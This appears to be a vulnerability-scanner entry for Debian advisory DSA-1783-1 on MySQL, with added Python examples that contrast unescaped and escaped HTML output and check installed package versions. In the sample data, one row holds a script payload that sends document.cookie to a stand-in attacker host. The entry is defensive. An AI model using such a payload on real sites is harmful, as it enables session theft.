Description: | Summary: The remote host is missing an update for the Debian 'mysql-dfsg-5.0' package(s) announced via the DSA-1783-1 advisory.
Vulnerability Insight: Multiple vulnerabilities have been identified affecting MySQL, a relational database server, and its associated interactive client application. The Common Vulnerabilities and Exposures project identifies the following two problems:
CVE-2008-3963
Kay Roepke reported that the MySQL server would not properly handle an empty bit-string literal in an SQL statement, allowing an authenticated remote attacker to cause a denial of service (a crash) in mysqld. This issue affects the oldstable distribution (etch), but not the stable distribution (lenny).
CVE-2008-4456
Thomas Henlich reported that the MySQL command-line client did not encode HTML special characters when run in HTML output mode (that is, 'mysql --html ...'). Values stored in the database are therefore emitted as raw markup, which can lead to cross-site scripting or to script running with unintended privileges if the resulting output is viewed in a browser or incorporated into a web site.
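As an added illustration of CVE-2008-4456 (example code written for this page, not code from the MySQL client or the Debian advisory): a small Python renderer that approximates the table markup 'mysql --html' emits, once copying cell contents verbatim as the unfixed client did and once HTML-escaping them as the fix does, plus a check that flags stored values reappearing as raw markup. The sample result set is constructed, and the exact markup layout attributed to the client is an assumption.

```python
import html

# Constructed sample result set. Row 2 holds the kind of value an attacker can
# store in a table (for instance through a web form) so that it later reaches a
# browser via unescaped 'mysql --html' output.
SAMPLE_COLUMNS = ["id", "comment"]
SAMPLE_ROWS = [
    (1, "plain text"),
    (2, "<script>location='http://attacker.example/?c='+document.cookie</script>"),
    (3, None),
]

# Characters that must never reach HTML output unencoded.
HTML_SPECIALS = "<>&\"'"


def cell_text(value):
    """Textual form of one cell; the client prints NULL for SQL NULL."""
    return "NULL" if value is None else str(value)


def render_html_unescaped(columns, rows):
    """Approximation (assumed layout) of the pre-fix 'mysql --html' output:
    column names and cell contents are copied verbatim into the markup, so any
    markup stored in the database becomes live HTML in a browser."""
    parts = ["<TABLE BORDER=1><TR>"]
    parts += ["<TH>%s</TH>" % name for name in columns]
    parts.append("</TR>")
    for row in rows:
        cells = "".join("<TD>%s</TD>" % cell_text(v) for v in row)
        parts.append("<TR>" + cells + "</TR>")
    parts.append("</TABLE>")
    return "".join(parts)


def render_html_escaped(columns, rows):
    """Hardened form: every column name and cell is HTML-escaped before it is
    placed in the markup, so a stored '<script>' renders as literal text."""
    parts = ["<TABLE BORDER=1><TR>"]
    parts += ["<TH>%s</TH>" % html.escape(name, quote=True) for name in columns]
    parts.append("</TR>")
    for row in rows:
        cells = "".join("<TD>%s</TD>" % html.escape(cell_text(v), quote=True) for v in row)
        parts.append("<TR>" + cells + "</TR>")
    parts.append("</TABLE>")
    return "".join(parts)


def leaks_raw_markup(output, rows):
    """Check: return the cell values containing HTML special characters that
    reappear verbatim in the rendered output (an empty list means safe)."""
    leaked = []
    for row in rows:
        for value in row:
            text = cell_text(value)
            if any(ch in text for ch in HTML_SPECIALS) and text in output:
                leaked.append(text)
    return leaked


if __name__ == "__main__":
    vulnerable = render_html_unescaped(SAMPLE_COLUMNS, SAMPLE_ROWS)
    hardened = render_html_escaped(SAMPLE_COLUMNS, SAMPLE_ROWS)
    print("unescaped output leaks:", leaks_raw_markup(vulnerable, SAMPLE_ROWS))
    print("escaped output leaks:  ", leaks_raw_markup(hardened, SAMPLE_ROWS))
```

The same check applies to any pipeline that pastes client output into a page: escaping has to happen at the point where data is placed into HTML, not be assumed of the tool that produced the data.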
For the old stable distribution (etch), these problems have been fixed in version 5.0.32-7etch10.
For the stable distribution (lenny), these problems have been fixed in version 5.0.51a-24+lenny1.
We recommend that you upgrade your mysql-dfsg-5.0 packages.
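A check against the fixed versions above, added here as example code (it is not part of the advisory or of Debian's tooling): a Python port of dpkg's version ordering, used to decide whether an installed mysql-dfsg-5.0 binary package is at or above the fixed version for its suite. The suite is inferred from the upstream part of the version (5.0.32 belongs to etch and 5.0.51a to lenny, per the fixed versions above); the dpkg-query output is constructed, and a host with a different upstream version (a backport, for example) is reported as not covered rather than guessed at.

```python
# Fixed versions from DSA-1783-1, keyed by suite codename.
FIXED_VERSIONS = {
    "etch": "5.0.32-7etch10",
    "lenny": "5.0.51a-24+lenny1",
}

# Constructed dpkg-query output, in the shape produced by
#   dpkg-query -W -f='${Package} ${Version}\n' 'mysql-*'
# on a hypothetical etch host that has not yet applied the update.
SAMPLE_DPKG_QUERY_OUTPUT = """\
mysql-client-5.0 5.0.32-7etch9
mysql-common 5.0.32-7etch9
mysql-server-5.0 5.0.32-7etch9
"""


def _order(c):
    """Sort weight of one character as in dpkg's verrevcmp(): digits and end of
    string weigh 0, '~' sorts before everything, letters sort by ASCII value and
    all other characters sort after letters."""
    if c == "" or c.isdigit():
        return 0
    if c == "~":
        return -1
    if c.isalpha():
        return ord(c)
    return ord(c) + 256


def _verrevcmp(a, b):
    """Compare two upstream-version or revision strings the way dpkg does,
    alternating between runs of non-digits and runs of digits."""
    i = j = 0
    while i < len(a) or j < len(b):
        first_diff = 0
        while (i < len(a) and not a[i].isdigit()) or (j < len(b) and not b[j].isdigit()):
            ac = _order(a[i]) if i < len(a) else 0
            bc = _order(b[j]) if j < len(b) else 0
            if ac != bc:
                return ac - bc
            i += 1
            j += 1
        while i < len(a) and a[i] == "0":
            i += 1
        while j < len(b) and b[j] == "0":
            j += 1
        while i < len(a) and a[i].isdigit() and j < len(b) and b[j].isdigit():
            if first_diff == 0:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if i < len(a) and a[i].isdigit():
            return 1
        if j < len(b) and b[j].isdigit():
            return -1
        if first_diff:
            return first_diff
    return 0


def split_version(version):
    """Split a Debian version into (epoch, upstream, revision)."""
    epoch, sep, rest = version.partition(":")
    if not sep:
        epoch, rest = "0", version
    upstream, sep, revision = rest.rpartition("-")
    if not sep:
        upstream, revision = rest, ""
    return int(epoch), upstream, revision


def debian_version_cmp(v1, v2):
    """Return -1, 0 or 1 as 'dpkg --compare-versions' would order v1 against v2."""
    e1, u1, r1 = split_version(v1)
    e2, u2, r2 = split_version(v2)
    c = (e1 - e2) or _verrevcmp(u1, u2) or _verrevcmp(r1, r2)
    return (c > 0) - (c < 0)


def suite_for(version):
    """Infer the suite from the upstream version: each suite's fixed version
    in the advisory has a distinct upstream part."""
    upstream = split_version(version)[1]
    for suite, fixed in FIXED_VERSIONS.items():
        if split_version(fixed)[1] == upstream:
            return suite
    return None


def assess(version):
    """Return (suite, is_fixed) for an installed version, or None when the
    upstream version matches neither suite covered by the advisory."""
    suite = suite_for(version)
    if suite is None:
        return None
    return suite, debian_version_cmp(version, FIXED_VERSIONS[suite]) >= 0


def assess_dpkg_query_output(text):
    """Parse '<package> <version>' lines into {package: (suite, is_fixed)} for
    every package whose version the advisory covers."""
    result = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 2:
            continue
        verdict = assess(fields[1])
        if verdict is not None:
            result[fields[0]] = verdict
    return result


if __name__ == "__main__":
    for pkg, (suite, fixed) in assess_dpkg_query_output(SAMPLE_DPKG_QUERY_OUTPUT).items():
        print("%-18s %-6s %s" % (pkg, suite, "fixed" if fixed else "VULNERABLE"))
```

On a live host, 'dpkg --compare-versions 5.0.32-7etch9 lt 5.0.32-7etch10' gives the same verdict; the port above exists so the comparison can be run offline against collected inventory, where a naive string comparison would wrongly rank "7etch9" above "7etch10".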
Affected Software/OS: 'mysql-dfsg-5.0' package(s) on Debian 4 (etch) and Debian 5 (lenny).
Solution: Please install the updated package(s).
CVSS Score: 4.0
CVSS Vector: AV:N/AC:L/Au:S/C:N/I:N/A:P
|